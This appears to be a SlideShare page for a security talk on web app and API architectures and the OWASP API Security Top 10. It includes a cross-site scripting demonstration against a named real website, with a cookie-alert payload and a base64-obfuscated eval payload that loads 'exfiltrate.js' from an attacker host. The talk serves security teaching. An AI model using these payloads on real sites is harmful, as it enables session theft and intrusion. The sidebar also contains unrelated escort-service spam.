SlideShare a Scribd company logo

Web Apps APIs' Nightmare Guide

Paulo Silva
Paulo Silva

The document discusses the evolution of web applications from traditional to modern architectures. It explains how traditional web apps involved separate files (HTML, CSS, JS) retrieved through individual HTTP requests, while modern apps retrieve all code in a single bundle and make additional requests to APIs. It also covers how mobile, IoT and other connected apps interact through APIs instead of web pages. Finally, it lists the OWASP API Security Top 10 risks and provides additional resources on secure API development.

Software
1 of 48
www.char49.com TRUE SECURITY Web Apps: APIs’ Nightmare
● Security Researcher/Pentester ● 15+ years as a Software Developer ● Long-term OWASP Volunteer ● Strong believer in spreading security awareness Who Am I Paulo Silva @pauloasilva_com /devpauloasilva paulo@char49.com Web Apps: APIs’ Nightmare
source: https://home.cern/science/computing/birth-web
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server GET / Content-Type: text/html HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: text/css ... GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php . . . ... GET /login.php Content-Type: text/html GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php . . . ... GET /login.php Content-Type: text/html GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript php index.php login.php . . . POST /login.php Content-Type: text/html
Web Apps: APIs’ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php posts.php comments.php . . .
Web Apps: APIs’ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database GET /users/me Content-Type: application/json . . . php auth.php users.php posts.php comments.php . . . Mobile Applications
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php . . . Mobile Applications
Web Apps: APIs’ Nightmare Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php ... . . . Mobile Applications
Web Apps: APIs’ Nightmare
Web Apps: APIs’ Nightmare
Web Apps: APIs’ Nightmare Connected Things Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ...
Web Apps: APIs’ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json Internet of Things Connected Things
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json Internet of Things Connected Things
Web Apps: APIs’ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json ... Connected Things
Web Apps: APIs’ Nightmare Modern Web Applications Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ...
Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript Modern Web Applications
Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json Modern Web Applications
Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json
Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json ...
Web Apps: APIs’ Nightmare OWASP API Security Top 10 API1:2023 Broken Object-Level Authorization API2:2023 Broken Authentication API3:2023 Broken Object Property Level Authorization API4:2023 Unrestricted Resource Consumption API5:2023 Broken Function-Level Authorization API6:2023 Unrestricted Access to Sensitive Business Flows API7:2023 Server Side Request Forgery API8:2023 Security Misconfiguration API9:2023 Improper Inventory Management API10:2023 Unsafe Consumption of APIs
API API API API API API API API API API API API API Web Apps: APIs’ Nightmare API
Web Apps: APIs’ Nightmare Vulnerable Parameter Cross-Site Scripting https://campaigns.porsche.com/charging/WebAjaxGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=x onerror=alert(document.cookie)>
Web Apps: APIs’ Nightmare Loader Payload Cross-Site Scripting
Web Apps: APIs’ Nightmare Payload Payload https://campaigns.porsche.com/charging/WebAjaxGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=x onerror=eval(atob(“KCgpID0+IHsKICBjb25zdCBzY3JpcHQgPSBkb2N1b WVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICBzY3JpcHQuc3JjID 0gJ2h0dH BzOi8vYXR0YWNrZXIuY29tL2V4ZmlsdHJhdGUuanMnOwogIGRvY3VtZW5 0LmJvZHk uYXBwZW5kQ2hpbGQoc2NyaXB0KTsKfSkoKQ==”))> Payload Cross-Site Scripting
Web Apps: APIs’ Nightmare Malicious Script HTTP Fundamentals Payload Cross-Site Scripting
Web Apps: APIs’ Nightmare OWASP Resources Other References ● OWASP API Security Project ● OWASP API Security Top 10 2023 ● OWASP API Security Top 10 2019 ● Goats ● OWASP Vulnerable Web Applications Directory ● OWASP crAPI - Completely Ridiculous API ● OWASP Juice Shop ● OWASP Cheat Sheets Series ● Authentication Cheat Sheet ● Authorization Cheat Sheet ● GraphQL Cheat Sheet ● REST Security Cheat Sheet ● Web Service Security Cheat Sheet ● OWASP Secure Coding Practices-Quick Reference Guide ● OWASP Go Secure Coding Practices Guide ● HTTP ● Basic of HTTP - mdn web docs ● Cross-Origin Resource Sharing (CORS) - mdn web docs ● API Protocols ● REST ● Representational state transfer - Wikipedia ● Representational State Transfer (REST) - Fielding Dissertation ● RPC ● Remote procedure call - Wikipedia ● OpenRPC ● JSON-RPC ● XML-RPC ● gRPC ● GraphQL ● Introduction to GraphQL ● GraphQL blogposts Series - Checkmarx ● Rate Limiting GraphQL APIs by Calculating Query Complexity - Shopify ● MindAPI ● MindAPI References
Web Apps: APIs’ Nightmare OWASP Resources Other References
www.char49.com Thank You!

Recommended

API Security - Null meet
API Security - Null meetAPI Security - Null meet
API Security - Null meetvinoth kumar
 
API Workshop: Deep dive into REST APIs
API Workshop: Deep dive into REST APIsAPI Workshop: Deep dive into REST APIs
API Workshop: Deep dive into REST APIsTom Johnson
 
How to build Simple yet powerful API.pptx
How to build Simple yet powerful API.pptxHow to build Simple yet powerful API.pptx
How to build Simple yet powerful API.pptxChanna Ly
 
Event-Driven Serverless Apps - Pop-up Loft Tel Aviv
Event-Driven Serverless Apps - Pop-up Loft Tel AvivEvent-Driven Serverless Apps - Pop-up Loft Tel Aviv
Event-Driven Serverless Apps - Pop-up Loft Tel AvivAmazon Web Services
 
HowYourAPIBeMyAPI
HowYourAPIBeMyAPIHowYourAPIBeMyAPI
HowYourAPIBeMyAPIJie Liau
 
Events, Picos, and Microservices
Events, Picos, and MicroservicesEvents, Picos, and Microservices
Events, Picos, and MicroservicesPhil Windley
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Realtime Content Delivery: Powering dynamic instant experiences
Realtime Content Delivery: Powering dynamic instant experiencesRealtime Content Delivery: Powering dynamic instant experiences
Realtime Content Delivery: Powering dynamic instant experiencesAkhilesh Gupta
 

Recommended

API Security - Null meet
API Security - Null meetAPI Security - Null meet
API Security - Null meetvinoth kumar
 
API Workshop: Deep dive into REST APIs
API Workshop: Deep dive into REST APIsAPI Workshop: Deep dive into REST APIs
API Workshop: Deep dive into REST APIsTom Johnson
 
How to build Simple yet powerful API.pptx
How to build Simple yet powerful API.pptxHow to build Simple yet powerful API.pptx
How to build Simple yet powerful API.pptxChanna Ly
 
Event-Driven Serverless Apps - Pop-up Loft Tel Aviv
Event-Driven Serverless Apps - Pop-up Loft Tel AvivEvent-Driven Serverless Apps - Pop-up Loft Tel Aviv
Event-Driven Serverless Apps - Pop-up Loft Tel AvivAmazon Web Services
 
HowYourAPIBeMyAPI
HowYourAPIBeMyAPIHowYourAPIBeMyAPI
HowYourAPIBeMyAPIJie Liau
 
Events, Picos, and Microservices
Events, Picos, and MicroservicesEvents, Picos, and Microservices
Events, Picos, and MicroservicesPhil Windley
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Realtime Content Delivery: Powering dynamic instant experiences
Realtime Content Delivery: Powering dynamic instant experiencesRealtime Content Delivery: Powering dynamic instant experiences
Realtime Content Delivery: Powering dynamic instant experiencesAkhilesh Gupta
 
Running gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesRunning gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesSungwon Lee
 
Design Web Api
Design Web ApiDesign Web Api
Design Web ApiTailor Fontela
 
Z101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisZ101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisTeodoro Cipresso
 
アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発LINE Corporation
 
Why your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncWhy your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncYan Cui
 
API Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsAPI Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsApigee | Google Cloud
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfVishwas N
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdfVishwas N
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdfVishwasN6
 
Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 OSSCube
 
API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014JonAbrams
 
Api Testing
Api TestingApi Testing
Api TestingVishwanath KC
 
Api Testing
Api TestingApi Testing
Api TestingVishwanath KC
 
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles ServiceAraport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Servicestevemock
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...CA API Management
 
Web Apps for the Masses
Web Apps for the MassesWeb Apps for the Masses
Web Apps for the MassesDavid Tufts
 
Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Daniel Zivkovic
 
What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...Kim Clark
 
API Design- Best Practices
API Design- Best PracticesAPI Design- Best Practices
API Design- Best PracticesPrakash Bhandari
 
Automating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationAutomating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationCA | Automic Software
 
XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsMehedi Hasan Shohan
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software DevelopersVinodh Ram
 

More Related Content

Similar to Web Apps APIs' Nightmare Guide

Running gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesRunning gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesSungwon Lee
 
Z101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisZ101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisTeodoro Cipresso
 
アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発LINE Corporation
 
Why your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncWhy your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncYan Cui
 
API Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsAPI Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsApigee | Google Cloud
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfVishwas N
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdfVishwas N
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdfVishwasN6
 
Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 OSSCube
 
API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014JonAbrams
 
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles ServiceAraport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Servicestevemock
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...CA API Management
 
Web Apps for the Masses
Web Apps for the MassesWeb Apps for the Masses
Web Apps for the MassesDavid Tufts
 
Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Daniel Zivkovic
 
What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...Kim Clark
 
Automating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationAutomating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationCA | Automic Software
 

Similar to Web Apps APIs' Nightmare Guide (20)

Running gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesRunning gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on Kubernetes
 
Design Web Api
Design Web ApiDesign Web Api
Design Web Api
 
Z101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisZ101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apis
 
アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発
 
Why your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncWhy your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSync
 
API Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsAPI Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIs
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdf
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdf
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdf
 
Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014
 
API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014
 
Api Testing
Api TestingApi Testing
Api Testing
 
Api Testing
Api TestingApi Testing
Api Testing
 
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles ServiceAraport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
 
Web Apps for the Masses
Web Apps for the MassesWeb Apps for the Masses
Web Apps for the Masses
 
Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup
 
What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...
 
API Design- Best Practices
API Design- Best PracticesAPI Design- Best Practices
API Design- Best Practices
 
Automating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationAutomating Rackspace with ONE Automation
Automating Rackspace with ONE Automation
 

Recently uploaded

XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsMehedi Hasan Shohan
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software DevelopersVinodh Ram
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyFrank van der Linden
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - InfographicHr365.us smith
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 
The Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfThe Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfPower Karaoke
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsJheuzeDellosa
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 

Recently uploaded (20)

XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software Solutions
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software Developers
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The Ugly
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - Infographic
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
The Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfThe Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdf
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number Systems
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.ppt
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
